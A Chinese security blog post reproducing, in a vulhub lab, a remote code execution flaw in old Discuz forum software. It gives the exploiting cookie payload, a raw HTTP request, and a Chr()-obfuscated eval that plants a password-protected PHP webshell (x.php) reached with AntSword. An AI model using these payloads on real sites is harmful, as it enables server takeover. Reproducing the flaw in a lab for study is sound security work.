freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

vulhub3-discuz(wooyun-2010-080723)
2023-01-17 15:33:48
所属地 甘肃省

1、靶场介绍

discuz是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。最新版本Discuz! X3.4正式版于2017年8月2日发布,去除了云平台的相关代码,是 X3.2 的稳定版本。2010年8月23日,康盛创想腾讯达成收购协议,成为腾讯全资子公司

2、漏洞介绍

漏洞类型:远程命令执行

漏洞编号:wooyun-2010-080723

3、漏洞搭建

http://192.168.1.170:8080/install/

1673940654_63c64eaece056ced78578.png!small?1673940648232

数据库名地址:db

数据库名称:discuz

用户名密码:root:root

1673940666_63c64eba21254e8064f02.png!small?1673940659992

4、漏洞复现

随便点击一个专题获取到cookie。

1673940676_63c64ec461f6111e4df6c.png!small?1673940669524


执行成功

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

GET /viewthread.php?tid=13&extra=page=1 HTTP/1.1
Host: 192.168.179.12:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

1673940710_63c64ee63c7aed3dfc8a3.png!small?1673940703546

反弹植入webshell

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))



在上述代码中,文件为:x.php   密码为: pwd 蚁剑连接。

1673940722_63c64ef238ae71dbc1f2b.png!small?1673940715647

1673940727_63c64ef743c41b0bcaa1d.png!small?1673940720430

连接成功

1673940737_63c64f0106c732da88ca5.png!small?1673940730227

漏洞纯数联手,漏洞时间太久,网上一大堆修复,不再赘叙。

# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录